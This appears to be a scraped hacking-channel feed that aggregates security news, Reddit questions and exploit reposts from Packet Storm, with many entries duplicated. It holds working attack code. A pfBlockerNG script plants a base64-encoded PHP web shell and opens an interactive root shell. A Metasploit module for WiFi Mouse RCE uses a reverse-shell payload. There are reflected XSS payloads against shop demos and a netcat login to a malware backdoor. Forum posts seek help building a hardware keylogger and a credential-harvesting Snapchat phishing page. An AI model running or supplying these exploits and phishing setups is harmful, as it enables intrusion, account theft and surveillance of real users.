Tryhackme 0day Makine Çözümü
https://medium.com/@barisures/tryhackme-0day-makine-%C3%A7%C3%B6z%C3%BCm%C3%BC-95445c3a7903?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@barisures/tryhackme-0day-makine-%C3%A7%C3%B6z%C3%BCm%C3%BC-95445c3a7903?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Tryhackme 0day Makine Çözümü
Açıklama: Selam arkadaşlar, Tryhackme platformunda bulunan ‘0day’ isimli makinenin çözümünü sizinle paylaşıyor olacağım. Bu makinede…
Açıklama: Selam arkadaşlar, Tryhackme platformunda bulunan ‘0day’ isimli makinenin çözümünü sizinle paylaşıyor olacağım. Bu makinede…Continue reading on Medium » (https://medium.com/@barisures/tryhackme-0day-makine-%C3%A7%C3%B6z%C3%BCm%C3%BC-95445c3a7903?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Tryhackme 0day Makine Çözümü
Açıklama: Selam arkadaşlar, Tryhackme platformunda bulunan ‘0day’ isimli makinenin çözümünü sizinle paylaşıyor olacağım. Bu makinede…
Nmap in pocket : A complete guide
https://medium.com/@krishArse/nmap-in-pocket-a-complete-guide-dff25ca13a0d?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@krishArse/nmap-in-pocket-a-complete-guide-dff25ca13a0d?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Nmap in pocket : A complete guide
Welcome Hackers,
Welcome Hackers,Continue reading on Medium » (https://medium.com/@krishArse/nmap-in-pocket-a-complete-guide-dff25ca13a0d?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Nmap in pocket : A complete guide
Welcome Hackers,
hacking: security in practice
Physical Keylogger with rpi4
I am fairly new to the hacking world, but I like pentest my home server and lab, recently, I discover the keylogger world, and my attention goes essentially to physical keylogger, because I have an antivirus protection, so software keylogger would be (in my case) weird.
I know Linux as a beginner and some basics in python, so I would like to know if its possible to make my physical MITM keylogger with rpi4. I heard that it contains several usb interfaces, to get the strokes, and emulate them to the victim pc.
My plan is that the rpi4 would be between the keyboard and the pc, so is it possible ? And can you put me on the way to achieve it ?
Thanks for any response
submitted by /u/No-Degree9754
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Physical Keylogger with rpi4
I am fairly new to the hacking world, but I like pentest my home server and lab, recently, I discover the keylogger world, and my attention goes essentially to physical keylogger, because I have an antivirus protection, so software keylogger would be (in my case) weird.
I know Linux as a beginner and some basics in python, so I would like to know if its possible to make my physical MITM keylogger with rpi4. I heard that it contains several usb interfaces, to get the strokes, and emulate them to the victim pc.
My plan is that the rpi4 would be between the keyboard and the pc, so is it possible ? And can you put me on the way to achieve it ?
Thanks for any response
submitted by /u/No-Degree9754
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Physical Keylogger with rpi4
I am fairly new to the hacking world, but I like pentest my home server and lab, recently, I discover the keylogger world, and my attention goes...
hacking: security in practice
If a website downloads something on my computer, can it be executed?
If a file is downloaded unexpectedly onto my computer when I visit a website, would that file be able to run without me doing anything?
Or is it more of a social engineer tactic where it wants you to click it in some way?
submitted by /u/Highfivesghost
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
If a website downloads something on my computer, can it be executed?
If a file is downloaded unexpectedly onto my computer when I visit a website, would that file be able to run without me doing anything?
Or is it more of a social engineer tactic where it wants you to click it in some way?
submitted by /u/Highfivesghost
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
phishing using apache2 ( not receiving input even tho I used a post method correctly )
https://external-preview.redd.it/l23l3fIj3iAb0PfyzKc5Cccavrw8F61ubtcTnNBr5YA.jpg?width=320&crop=smart&auto=webp&s=77076262c4a08d2b88f620dbb222844c546282f4 ( no I wont use this on anyone I dont want to end my career before starting it I am not dumb )
so I saw this video https://www.youtube.com/watch?v=U6pDqFhN82I its about pen testing and the girl is really good at social engineering and phishing it made me very interested in trying phishing ( also I am studying computer science so I am generally interested in cybersecurity and programming )
I tried creating a snapchat phishing page but i couldn't clone (Issues with SET for some reason) So I downloaded zphisher but the ngrok server used in it shows a warning before you can access page, and the cloudflare is extremely slow and so I just copied the snapchat files from the .sites folder ( login.php, index.php and users.php and also got the file usernames.txt which was included in the post method in the code ) then put it /var/www/html/ and started an apache2 server then ssh -R 80:localhost:80 localhost.run ( so it can be accessd over the internet and try it on another machine, also can this be dangerous since my pen testing machine that I use this on has now a port exposed to the internet? )
I tried it but nothing shows up in the usernames.txt file for some reason ( ik its probably because I did something dumb or missed something obvious so bear with me in my journey to not be a skid, I just want it to work then I'll study the code then learn how to code pages like this by myself also I am learning basics, just finished a youtube course about kali linux command line and a network+ course )
does anyone know what the issue maybe ?
also what I did ( literally just copied the zphisher snapchat template )
https://preview.redd.it/irmlifanh7q91.png?width=821&format=png&auto=webp&s=273894a5ec02ce503cc661a7c9c5af773c07752b
the files : https://drive.google.com/drive/folders/1y2obE3vmNWR3Z-v697ngO5AKAC4cxVgp?usp=sharing
submitted by /u/Fuck_Life_421
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
phishing using apache2 ( not receiving input even tho I used a post method correctly )
https://external-preview.redd.it/l23l3fIj3iAb0PfyzKc5Cccavrw8F61ubtcTnNBr5YA.jpg?width=320&crop=smart&auto=webp&s=77076262c4a08d2b88f620dbb222844c546282f4 ( no I wont use this on anyone I dont want to end my career before starting it I am not dumb )
so I saw this video https://www.youtube.com/watch?v=U6pDqFhN82I its about pen testing and the girl is really good at social engineering and phishing it made me very interested in trying phishing ( also I am studying computer science so I am generally interested in cybersecurity and programming )
I tried creating a snapchat phishing page but i couldn't clone (Issues with SET for some reason) So I downloaded zphisher but the ngrok server used in it shows a warning before you can access page, and the cloudflare is extremely slow and so I just copied the snapchat files from the .sites folder ( login.php, index.php and users.php and also got the file usernames.txt which was included in the post method in the code ) then put it /var/www/html/ and started an apache2 server then ssh -R 80:localhost:80 localhost.run ( so it can be accessd over the internet and try it on another machine, also can this be dangerous since my pen testing machine that I use this on has now a port exposed to the internet? )
I tried it but nothing shows up in the usernames.txt file for some reason ( ik its probably because I did something dumb or missed something obvious so bear with me in my journey to not be a skid, I just want it to work then I'll study the code then learn how to code pages like this by myself also I am learning basics, just finished a youtube course about kali linux command line and a network+ course )
does anyone know what the issue maybe ?
also what I did ( literally just copied the zphisher snapchat template )
https://preview.redd.it/irmlifanh7q91.png?width=821&format=png&auto=webp&s=273894a5ec02ce503cc661a7c9c5af773c07752b
the files : https://drive.google.com/drive/folders/1y2obE3vmNWR3Z-v697ngO5AKAC4cxVgp?usp=sharing
submitted by /u/Fuck_Life_421
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
phishing using apache2 ( not receiving input even tho I used a...
Posted in r/hacking by u/Fuck_Life_421 • 2 points and 0 comments
Cloud Lab
https://www.reddit.com/r/Pentesting/comments/xok8qi/cloud_lab/
Hello, I am moving away from my home lab because I have a old server that is sucking up too much electricity in my house. I am looking for cloud services were I can make a low (or free) cost AD pentesting lab that charges me when I am using it and does not when I am not using it. Does anybody have any suggestions? I know of hackthebox, tryhackme, vulnhub etc (i use them frequently) but that is not what I am looking for, I am looking for a lab I can add multiple machines and make my own networks. Thanks! submitted by /u/Realistic_Otter (https://www.reddit.com/user/Realistic_Otter)
[link] (https://www.reddit.com/r/Pentesting/comments/xok8qi/cloud_lab/) [comments] (https://www.reddit.com/r/Pentesting/comments/xok8qi/cloud_lab/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/xok8qi/cloud_lab/
Hello, I am moving away from my home lab because I have a old server that is sucking up too much electricity in my house. I am looking for cloud services were I can make a low (or free) cost AD pentesting lab that charges me when I am using it and does not when I am not using it. Does anybody have any suggestions? I know of hackthebox, tryhackme, vulnhub etc (i use them frequently) but that is not what I am looking for, I am looking for a lab I can add multiple machines and make my own networks. Thanks! submitted by /u/Realistic_Otter (https://www.reddit.com/user/Realistic_Otter)
[link] (https://www.reddit.com/r/Pentesting/comments/xok8qi/cloud_lab/) [comments] (https://www.reddit.com/r/Pentesting/comments/xok8qi/cloud_lab/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Cloud Lab
Hello, I am moving away from my home lab because I have a old server that is sucking up too much electricity in my house. I am looking for cloud...
Dark Reading: Attacks/Breaches
Samsung Fails Consumers in Preventable Back-to-Back Data Breaches, According to Federal Lawsuit
Company unnecessarily collected consumers' personal data and failed to safeguard it, suit alleges, leading to two back-to-back data breaches.
___________________________
@hacking_Attack
@Hacking_Video
Samsung Fails Consumers in Preventable Back-to-Back Data Breaches, According to Federal Lawsuit
Company unnecessarily collected consumers' personal data and failed to safeguard it, suit alleges, leading to two back-to-back data breaches.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Samsung Fails Consumers in Preventable Back-to-Back Data Breaches, According to Federal Lawsuit
Company unnecessarily collected consumers' personal data and failed to safeguard it, suit alleges, leading to two back-to-back data breaches.
Dark Reading: Attacks/Breaches
How Quantum Physics Leads to Decrypting Common Algorithms
YouTuber minutephysics explains how Shor's algorithm builds on existing formulae like Euclid's algorithm and Fourier transforms to leverage quantum superpositioning and break encryption.
___________________________
@hacking_Attack
@Hacking_Video
How Quantum Physics Leads to Decrypting Common Algorithms
YouTuber minutephysics explains how Shor's algorithm builds on existing formulae like Euclid's algorithm and Fourier transforms to leverage quantum superpositioning and break encryption.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
How Quantum Physics Leads to Decrypting Common Algorithms
YouTuber minutephysics explains how Shor's algorithm builds on existing formulae like Euclid's algorithm and Fourier transforms to leverage quantum superpositioning and break encryption.
Exploit Collector
LivelyCart Pro 3 Cross Site Scripting
https://4.bp.blogspot.com/-IV-83q7tlNU/WWlvNru3JHI/AAAAAAAAIMg/qWmIdM50sJs0a5mqLHfeVDVNkTKQ10wJwCLcBGAs/s1600/h23.png LivelyCart Pro version 3 suffers from a cross site scripting vulnerability.
SHA-256 |
___________________________
@hacking_Attack
@Hacking_Video
LivelyCart Pro 3 Cross Site Scripting
https://4.bp.blogspot.com/-IV-83q7tlNU/WWlvNru3JHI/AAAAAAAAIMg/qWmIdM50sJs0a5mqLHfeVDVNkTKQ10wJwCLcBGAs/s1600/h23.png LivelyCart Pro version 3 suffers from a cross site scripting vulnerability.
SHA-256 |
ef3470c3fee8e0e813c2945b5ef78e86a17766d13550ed989a8641bba9fb6852Download ┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : pro-demo.livelycart.com │
│ Vendor : livelyworks - livelyworks.net │
│ Software : LivelyCart Pro 3 - Laravel E-Commerce Platform │
│ Vuln Type: Reflected XSS │
│ Method : GET │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter 'min_price' is vulnerable to XSS
https://pro-demo.livelycart.com/products?min_price=11[XSS]&max_price=999&sort_by=created_at&sort_order=asc&
GET parameter 'max_price' is vulnerable to XSS
https://pro-demo.livelycart.com/products?min_price=11&max_price=999[XSS]&sort_by=created_at&sort_order=asc&
Some XSS Payloads Reflected
ss29h">gub34
yljlw">onc87
[-] Done Source:packetstormsecurity.com___________________________
@hacking_Attack
@Hacking_Video
Kitploit
LivelyCart Pro 3 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
pfBlockerNG 2.1.4_26 Shell Upload
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
pfBlockerNG version 2.1.4_26 unauthenticated remote shell upload exploit.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
pfBlockerNG 2.1.4_26 Shell Upload
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
pfBlockerNG version 2.1.4_26 unauthenticated remote shell upload exploit.
SHA-256 |
1d7eee5bc1593b474c54a3d280da28d67551d6ae08d22fa5a7a679595e50b007Download
#!/usr/bin/env python3
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
parser = argparse.ArgumentParser(description="pfBlockerNG <=
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()
url = args.url
shell_filename = "system_advanced_control.php"
def check_endpoint(url):
response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
if response.status_code == 200:
print("[+] pfBlockerNG is installed")
else:
print("\n[-] pfBlockerNG not installed")
sys.exit()
def upload_shell(url, shell_filename):
payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
print("[/] Uploading shell...")
response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
time.sleep(2)
response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
print("[+] Upload succeeded")
else:
print("\n[-] Error uploading shell. Probably patched ", response.content)
sys.exit()
def interactive_shell(url, shell_filename, cmd):
response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
print(str(response.text)+"\n")
def delete_shell(url, shell_filename):
delcmd = "rm /usr/local/www/system_advanced_control.php"
response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
print("\n[+] Shell deleted")
check_endpoint(url)
upload_shell(url, shell_filename)
try:
while True:
cmd = input("# ")
interactive_shell(url, shell_filename, cmd)
except:
delete_shell(url, shell_filename)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
pfBlockerNG 2.1.4_26 Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Backdoor.Win32.Psychward.b MVID-2022-0645 Hardcoded Credential
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Backdoor.Win32.Psychward.b malware suffers from a hardcoded credential vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Psychward.b MVID-2022-0645 Hardcoded Credential
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Backdoor.Win32.Psychward.b malware suffers from a hardcoded credential vulnerability.
SHA-256 |
4a196172d709119bf5c9fd8264d2064a406a4232f965f914f828caf704ad4124Download
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/0b8cf90ab9820cb3fcb7f1d1b45e4e57.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Psychward.b
Vulnerability: Weak Hardcoded Credentials
Description: The malware listens on TCP port 8888 and requires authentication. However, the password "4174" is weak and hardcoded in cleartext within the PE file.
Family: Psychward
Type: PE32
MD5: 0b8cf90ab9820cb3fcb7f1d1b45e4e57
Vuln ID: MVID-2022-0645
Disclosure: 09/25/2022
Exploit/PoC:
C:\>nc64.exe x.x.x.x 8888
connected 09/12/22 20:44:12. version 0.2.1
pwd 4174
password accepted
dir
..
12520437.cpx 2,151
12520850.cpx 2,233
@AudioToastIcon.png 308
@EnrollmentToastIcon.png 330
@VpnToastIcon.png 404
@WirelessDisplayToast.png 691
aadauthhelper.dll 154,624
aadtb.dll 954,880
AboveLockAppHost.dll 252,928
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Psychward.b MVID-2022-0645 Hardcoded Credential
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Veritas Backup Exec Agent Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Veritas Backup Exec Agent Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Veritas Backup Exec Agent Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WiFi Mouse 1.8.3.4 Remote Code Execution
https://3.bp.blogspot.com/-XNOhyhmygqg/WWlvTLzMLRI/AAAAAAAAINo/1vKZqL-UEc0yrpuP08mTX_Jxjx_k32PvQCLcBGAs/s1600/h41.png
The WiFi Mouse (Mouse Server) from Necta LLC contains an authentication bypass as the authentication is completely implemented entirely on the client side. By utilizing this vulnerability, is possible to open a program on the server (cmd.exe in our case) and type commands that will be executed as the user running WiFi Mouse (Mouse Server), resulting in remote code execution. Tested against versions 1.8.3.4 (current as of module writing) and 1.8.2.3.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WiFi Mouse 1.8.3.4 Remote Code Execution
https://3.bp.blogspot.com/-XNOhyhmygqg/WWlvTLzMLRI/AAAAAAAAINo/1vKZqL-UEc0yrpuP08mTX_Jxjx_k32PvQCLcBGAs/s1600/h41.png
The WiFi Mouse (Mouse Server) from Necta LLC contains an authentication bypass as the authentication is completely implemented entirely on the client side. By utilizing this vulnerability, is possible to open a program on the server (cmd.exe in our case) and type commands that will be executed as the user running WiFi Mouse (Mouse Server), resulting in remote code execution. Tested against versions 1.8.3.4 (current as of module writing) and 1.8.2.3.
SHA-256 |
a1eb49c803eef32a7d3986d02c20457c3afa4cb25fe942b90918d6d5bcceb6e6Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Wifi Mouse RCE',
'Description' => %q{
The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
authentication is completely implemented entirely on the client side. By utilizing
this vulnerability, is possible to open a program on the server
(cmd.exe in our case) and type commands that will be executed as the user running
WiFi Mouse (Mouse Server), resulting in remote code execution.
Tested against versions 1.8.3.4 (current as of module writing) and
1.8.2.3.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'REDHATAUGUST', # edb
'H4RK3NZ0' # edb, original discovery
],
'References' => [
[ 'EDB', '50972' ],
[ 'EDB', '49601' ],
[ 'CVE', '2022-3218' ],
[ 'URL', 'http://wifimouse.necta.us/' ],
[ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]
],
'Arch' => [ ARCH_X64, ARCH_X86 ],
'Platform' => 'win',
'Targets' => [
[
'stager',
{
'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil']
}
],
],
'Payload' => {
'BadChars' => "\x0a\x00"
},
'DefaultOptions' => {
# since this may get typed out ON SCREEN we want as small a payload as possible
'PAYLOAD' => 'windows/shell/reverse_tcp'
},
'DisclosureDate' => '2021-02-25',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [CRASH_SERVICE_DOWN],
'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen
}
)
)
register_options(
[
OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]),
OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method. Smaller for more unstable connections.', 1_020]),
]
)
end
def send_return
sock.put('key 3RTN') # what the mobile app sends
end
def send_command(command)
sock.put("utf8 #{command}\x0A")
sleep(datastore['SLEEP'])
send_return
end
def open_file(file)
file = "/#{file}".gsub('\\', '/').gsub(':', '')
sock.put("openfile #{file}\x0A")
end
def exploit
connect
print_status('Opening command prompt')
open_file('C:\\Windows\\System32\\cmd.exe')
sleep(datastore['SLEEP']) # give time for it to open
print_status('Typing out payload')
execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })
handler
end
def execute_command(cmd, _opts = {})
send_command(cmd)
end
end
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WiFi Mouse 1.8.3.4 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
osCommerce Shopping Cart 4 Cross Site Scripting
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png osCommerce Shopping Cart version 4 suffers from a cross site scripting vulnerability.
SHA-256 |
___________________________
@hacking_Attack
@Hacking_Video
osCommerce Shopping Cart 4 Cross Site Scripting
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png osCommerce Shopping Cart version 4 suffers from a cross site scripting vulnerability.
SHA-256 |
fc69e57f711d661b929686f94b698df88ccb2c5f0d2030e7b4840f26fe62da93Download ┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : oscommerce.com │
│ Vendor : osCommerce LTD │
│ Software : osCommerce Shopping Cart v4 - Reflected XSS │
│ Vuln Type: Reflected XSS │
│ Method : GET │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter 'keywords' is vulnerable to XSS
/catalog/all-products?keywords=[XSS]
https://demo.oscommerce.com/watch/catalog/all-products?keywords=d05zz%22%3E%3Cscript%3Ealert(1)%3C/script%3Eju3gw
https://demo.oscommerce.com/printshop/catalog/all-products?keywords=d05zz%22%3e%3cscript%3ealert(1)%3c%2fscript%3eju3gw
https://demo.oscommerce.com/furniture/catalog/all-products?keywords=d05zz%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Eju3gw
[-] Done Source:packetstormsecurity.com___________________________
@hacking_Attack
@Hacking_Video
Kitploit
osCommerce Shopping Cart 4 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.